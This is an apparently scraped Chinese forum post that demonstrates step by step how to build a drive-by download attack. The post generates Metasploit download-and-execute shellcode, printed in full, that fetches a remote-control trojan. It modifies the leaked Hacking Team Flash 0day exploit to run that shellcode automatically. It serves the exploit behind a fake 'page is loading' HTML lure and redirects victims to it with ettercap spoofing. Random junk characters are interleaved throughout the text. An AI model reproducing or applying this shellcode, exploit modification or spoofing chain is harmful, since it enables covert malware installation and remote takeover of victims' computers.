flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

- s& I0 h" q$ x6 B X; \; q 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 |% G, a. H% i8 J

; G! T" `9 \% |6 n& Y2 K 利用到的工具： * M ^' r- \9 d7 j

5 |. p% m, q( @* f6 f. w Msf 1 J. [: ?" Z& w1 |

* e( U8 X2 B6 h# U6 T* {$ Z z Ettercap ( S+ i8 u( `' T; f$ T( e* j

1 x& }4 m) i/ y& n4 w Adobe Flash CS6 ( u7 L+ W6 m' a$ q# i% ~& J3 ]

* a" O/ O& J, |/ \ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 + s% E4 e; W: U3 s3 W

' D0 v7 {. Y: a/ m5 f) f6 x2 | 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options ' r1 n9 P0 G6 Z! x( G" o k

7 V! B2 n2 ]# R( f& w7 m 如图： 5 ?9 |. \, x) |% k+ V: x

3 z R* y' s7 J' ? 3 E0 `0 m6 U( g6 E0 C. U$ r' \

# g3 {& U/ b9 r+ F! \# f- a$ k 5 b% p9 [ v& P4 m* Y% O& D* U

$ A3 A, l' C4 W0 I& \* Z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: - R& D! m" E( j7 F, Z Q

2 [5 q1 v* }$ I9 {5 N% `5 W7 S : i) g0 q- W" g7 u9 ^+ o0 L

; i3 n8 e+ ]. H" I9 G 3 k& y0 _! V: M: C9 s& o

( {7 S- `2 u" L3 Q( Q1 R 然后执行generate -t dword生成shellcode，如下： 6 {3 h" d. [1 L8 h c* u, {

% @( m( h6 s8 L( ]% w* i. ^& z7 s 8 M k/ Z$ l- d+ t" L

' T- \+ |4 u* f 复制代码到文本下便于我们一会编辑flash exp，如下： 8 }% W2 S4 x+ W

3 z. ]% S* I" a" `- D4 H- a 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 @! d) ~1 X/ Q. L& d2 a' W

9 E4 c; w0 w& | 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 J( S5 L8 I! o

6 F, x/ C4 M/ w, x4 N" E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! O1 F1 r" k0 P

, @) y! B& X: \" A& @0 y 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 F. w- A# q0 D* j, B5 y) u# V

! P* [5 H9 D" ?* N7 J0 p$ _4 Z& Z 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, $ d- x/ R i9 R' c1 x# f( ?

% O& ~3 P v$ {/ f& U 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 1 G+ S8 p- r$ r, F7 U

9 W1 i6 H! X# V. i/ L* M 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 b7 T n0 l4 C8 q. U" o5 h

+ {2 Y& S- p. T: G0 a4 r! W) o( Z 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, + ]% l2 m' V5 Y

4 d8 b1 v) c/ n8 K7 T9 p9 H5 R' k 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 0 F* o+ y- U' V

1 e* M; F8 }- E) v 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 0 a; X# Q' D- M8 {7 V; a

1 T& X0 \7 L* v3 n 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # S# l. u6 w+ p3 X( F* N

* A" Q {* t# n S4 W/ b8 F 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , o& {/ W3 y* n) `5 \

/ f1 V" a& r8 f" |. X! n, x! K 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 T( B9 D7 @7 Y# [$ y) I. R H8 A

- t9 W; I4 k% @1 t/ W- K: C0 f8 k 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 . d* N' v- Y/ Z! x5 m0 v

% n: d; X: P$ k- K+ ? ; `. f. l" O. V8 `5 |

4 b" D: I0 o) c5 b) K 8 y4 J1 K( B9 T b

3 R0 V; C0 m9 ?& i; Y8 f 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 5 B u2 n& K7 S

5 `, O0 u- I, y- n3 a+ d& @% H* ` 9 [# ] B3 e$ e( q+ W" K

4 H9 u g# L ]$ Y% s; x) F3 p 先修改ShellWin32.as，部分源代码如图： # o/ U& I. Y1 n$ x

" R% l0 ]8 w. n, @ : k! l# y5 w+ d6 Z' j3 l

* V/ g: m+ @# f( ]" F+ t 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 5 ~5 ^8 {/ `6 ?; V* X$ u8 @6 p; |

6 A/ x# \! x2 Z 5 S. @: @5 u S$ \6 {

) `$ S1 j6 l4 p# V9 R 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： i% N: R: }# Z) E- Y/ a/ n+ b

& N' @* \, F- S1 l& m8 L 0 k; ]! ]- F% p

, p# j' r* F& i2 y 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： 8 Y' S6 `$ b% h1 s8 {; w% @

: J- K$ T* \0 M' ?4 v1 @ d) Q+ A, Y( }( F

( k# I8 Y3 ~6 ? 6 d7 s. M9 c& r

# J- u y1 U; p! s( Z2 o' j p - T) c: i$ E/ ]3 }7 M: @, A' z( H

$ W& R# ?2 G1 ~! _% I 然后点保存，下面我们来编译一下，打开 $ }. s, u5 _8 x4 W# U8 P& I: D! Q

Q0 M- s: r' ~) o: {$ V6 c exp1.fla然后点文件-发布，看看编译没错误 6 _+ L( h. j! f% I# R! c/ w

# o! {" a* |$ `5 o 4 F1 Q' W1 O. D* f- ]. z; ]$ [

& a8 M' J$ w" X9 B5 c 2 O) G( h- L5 F

7 M$ v. U: D. F0 ^ 0 E! u; B1 t3 ?' {( C

+ u& T4 M5 O }) h# E ; R) \: u1 p( i8 e' n, c* X

- ^& I! T4 o5 Z$ m) [& w 然后我们把生成的 $ [) m( U/ S& m1 V3 h% d

! W5 E+ p" `$ j- T! U+ S exp1.swf丢到kailinux 的/var/www/html下： / r: |4 N; a0 i, |# j; o

' j2 O4 B9 n0 a! C. L 然后把这段代码好好编辑一下 % e: `* `- O+ ?6 @: ?+ J+ V) `$ Y

7 s9 G- ?, d4 Z1 J 7 {, X" X* F! k) i: P$ R

6 }, }/ F" O% w& ]5 f' r # U( n5 }: z4 G7 [. v" P

. s/ e; k7 J% R8 Q0 Z% R 4 U$ u( s l# i; ?0 M2 N: K$ |; M

% A# u5 r0 X# [$ q # H w& G9 n+ ?% C; Q

! w% ?- U% T9 U, { " q% d: ^0 B) s$ D9 K" l7 U

M) t j B4 R. U9 K4 G8 X 6 T8 K& n' ?) [4 E; H$ Z

( ] J$ F- U; [) I <!DOCTYPE html> : ^5 C6 ~+ ^. s, ?* Q$ T: P9 k' y

4 ^- p1 Z( n8 B& x <html> * }* b# U. Q2 Y1 z! }9 V; R0 H9 c' b

- s# H' L, P3 N <head> ' E; a/ Z- k+ L( e8 t5 k2 d) d

, w( V; V% q+ K+ D <meta http-equiv="Content-Type" content="text/html; ( O& G* v4 w5 D# p. j

( Z% a R. [* `( O: ^3 j7 X charset=utf-8"/> 9 }: j' p" Z2 N, I! f$ j' m# d! F. w6 o

$ {2 Z/ Q+ B; }% d </head> ) h) E! g6 x" r |* a

* Y# Z7 k& f- K) s <body> : O8 A# G" ~4 e% R

4 t! U8 C. y) \. J <h2> Please wait, the requested page is loading...</h2> ; n# t3 e/ |3 P8 h

6 j: E; Q: D8 n0 M. } <br> 1 `, k+ f Y* t) E Q6 m

# s/ g" z# L( s8 x0 q+ q- V& S, ?" A <OBJECT 2 V$ ]$ u: I. O+ ?; l* _8 m

) Z$ ^, Y5 O2 f: k4 D classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ; \" S5 i1 ~# C+ n# \7 s' Y

1 A+ X" Z* x' H$ F VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 6 W4 b# C" l4 q8 B. q+ j

8 W3 W# |3 n! ^8 ^! M" m% j </body> - U8 F- O( l1 ]. T4 f0 Q

1 c. g7 o- z9 p# ?; T <script> 9 ~4 p/ C% l; @

0 X8 E; x4 o! a: ~5 D F setTimeout(function () { - Y$ g' ~, J4 j$ r$ y: Z& {

1 l( M% v M, y6 [1 c+ z) f . x. S) f; h* b/ C% q

2 Q* W; t' E/ H4 u/ L: e! Q: \ window.location.reload(); i- t9 a- h7 G8 n6 o! p

5 P5 @5 d! x$ J7 k5 ~ }, 10000); " | q" D" U4 G, l7 E+ e; e

+ W: T5 [: }& O. k' Y* O & j& }& |/ \% v4 y* r

. I) u: P. P" Y7 O4 _1 y6 f </script> " y I7 J- ^! r8 C2 h

# f) |) R% y: E9 }* i </html> ! @5 P6 b6 P$ ^: U3 M- B+ Y

5 N2 C% K7 i5 ^# @$ X+ H V8 {% D$ o) s+ C4 U5 j& N

9 @0 L$ X' c8 a8 r: K9 d% _ 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： ( x+ x; s+ u+ `6 Z1 {

- n# g3 ?% l+ [8 Q0 k + f+ W3 j$ g; f: L" u% \! Q

$ B' {( v5 P2 ]' u* S7 d$ W / D5 W1 a; d0 F! [5 E8 w# [

$ Z3 z& a S; u. y: c; z0 z M. m 4 R7 O& J: _7 m Z" s( D4 [

$ Z5 d, I1 ?0 B0 q. l' L4 j, a : ~5 r' S; q$ L8 E9 h2 w" R; m+ k5 w; m

/ I. Z/ a( \; Y- D 8 |6 j; e- p" D- R8 G" s* X

. @0 J: v* u7 J) Q4 | 下面我们用ettercap欺骗如图： 8 U% {; N& ^# U# ?- v) C1 L# ?

7 L9 u T3 l& E' q& Y2 o 8 y5 n0 a2 l3 f# W; V3 r8 X7 N; W

2 q# w. K0 c5 S 1 s0 r" x( _$ y6 B2 `' h

" V0 p$ S: G3 T9 O) I; Q' R" A 下面我们随便访问个网站看看： , o3 f! s4 \; Z' ]* H% k

9 u8 S) o% Y3 N, Q M7 M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： 4 }3 j( Y @' J; n7 G' A, E

6 G% }( m5 F- P 4 g, s: f, h) B% V4 H+ N

3 k3 v! f, G7 b o2 G R4 m y9 s 我们看另一台， ) |4 ]' {$ B% a9 i5 M! @

8 d! S L3 x9 ~& m: v 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 " H1 x5 ` A7 ~+ h& J

		自动登录	找回密码
密码			立即注册